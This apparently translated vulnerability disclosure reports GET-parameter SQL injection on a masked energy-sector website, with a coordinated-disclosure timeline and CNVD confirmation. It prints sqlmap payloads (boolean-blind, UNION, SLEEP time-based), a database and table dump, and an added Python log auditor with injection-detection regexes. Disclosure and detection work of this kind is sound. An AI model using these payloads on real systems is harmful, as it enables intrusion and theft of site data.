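2015-10-16: Details reported to the vendor; awaiting vendor handling
2015-10-20: Vendor confirmed; details disclosed to the vendor only
2015-10-30: Details disclosed to core white hats and experts in related fields
2015-11-09: Details disclosed to regular white hats
2015-11-19: Details disclosed to intern white hats
2015-12-04: Details disclosed to the public
Four instances bundled into one report; too lazy to farm points.
The injections are all GET-type, four in total: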
http://**.**.**.**/fblog/artview?ID=101&id=15594
http://**.**.**.**/index?m=ftheme&a=listbk&tpl=2&tid=214
**.**.**.**/index?m=ftheme&a=listbk&tpl=2&tid=214
http://**.**.**.**/fblog/index?ID=1850
Using this one as the example for the demonstration:
Place: GET
Parameter: tid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=ftheme&a=listbk&tpl=2&tid=214 AND 5810=5810

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: m=ftheme&a=listbk&tpl=2&tid=-8154 UNION SELECT NULL, CONCAT(0x3a666a3a,0x4967466c484168714b47,0x3a6562723a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: m=ftheme&a=listbk&tpl=2&tid=214 AND SLEEP(5)
---
[16:24:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.28, Apache 2.4.9
back-end DBMS: MySQL 5.0.11
[16:24:12] [INFO] fetching current user
current user: 'trqgydb@localhost'

available databases [4]:
[*] information_schema
[*] test
[*] trqgydb
[*] trqgydb_en
169 tables
[16:30:06] [INFO] the SQL query used returns 169 entries
[16:30:08] [INFO] retrieved: "[u'information_schema', u'CHARACTER_SETS']"
[16:30:10] [INFO] retrieved: "[u'information_schema', u'COLLATIONS']"
[16:30:12] [INFO] retrieved: "[u'information_schema', u'COLLATION_CHARACTER_S
[16:30:14] [INFO] retrieved: "[u'information_schema', u'COLUMNS']"
[16:30:16] [INFO] retrieved: "[u'information_schema', u'COLUMN_PRIVILEGES']"
[16:30:18] [INFO] retrieved: "[u'information_schema', u'ENGINES']"
[16:30:19] [INFO] retrieved: "[u'information_schema', u'EVENTS']"
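For the site operator's side of this report, the following added example (not part of the original report) audits Apache access-log lines for the injected parameters and labels each hit with the technique class from the sqlmap output above. It assumes that `ID`, `id`, `tid` and `tpl` only ever carry non-negative integers and that the log uses the common Apache format; the sample log lines, client addresses and timestamps are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters only ever carry non-negative integer ids,
# as in the four URLs listed in the report (ID, id, tid, tpl).
NUMERIC_PARAMS = {"id", "tid", "tpl"}

# Technique classes named in the sqlmap output; first match wins.
TECHNIQUES = [
    ("UNION query", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("time-based blind", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\b(?:and|or)\s+\S+?\s*=\s*\S+", re.I)),
]
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    for name, pattern in TECHNIQUES:
        if pattern.search(value):
            return name
    return "non-numeric value"

def audit_target(target):
    """Return [(param, technique)] for numeric params holding anything but digits."""
    findings = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key.lower() in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            findings.append((key, classify(value)))
    return findings

def audit_log(lines):
    """Return [(client, param, technique)] for every flagged access-log line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            hits += [(m.group(1), p, t) for p, t in audit_target(m.group(2))]
    return hits

# Constructed Apache access-log lines (documentation addresses, invented times).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Oct/2015:16:20:01 +0800] "GET /fblog/artview?ID=101&id=15594 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [16/Oct/2015:16:24:10 +0800] "GET /index?m=ftheme&a=listbk&tpl=2&tid=214%20AND%205810%3D5810 HTTP/1.1" 200 4096',
    '192.0.2.77 - - [16/Oct/2015:16:24:11 +0800] "GET /index?m=ftheme&a=listbk&tpl=2&tid=-8154%20UNION%20SELECT%20NULL,%20CONCAT(0x3a)%23 HTTP/1.1" 200 4101',
    '192.0.2.77 - - [16/Oct/2015:16:24:12 +0800] "GET /index?m=ftheme&a=listbk&tpl=2&tid=214%20AND%20SLEEP(5) HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in audit_log(SAMPLE_LOG):
        print(hit)
```

The same digits-only check, applied in the application before the value reaches the query (together with parameterized statements), closes all three technique classes at once.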
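Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-10-20 16:39
CNVD has confirmed and reproduced the situation described, and has passed it via CNCERT to the authority in charge of informatization for the energy sector, which will coordinate with the organization that manages the site to handle it.
None yet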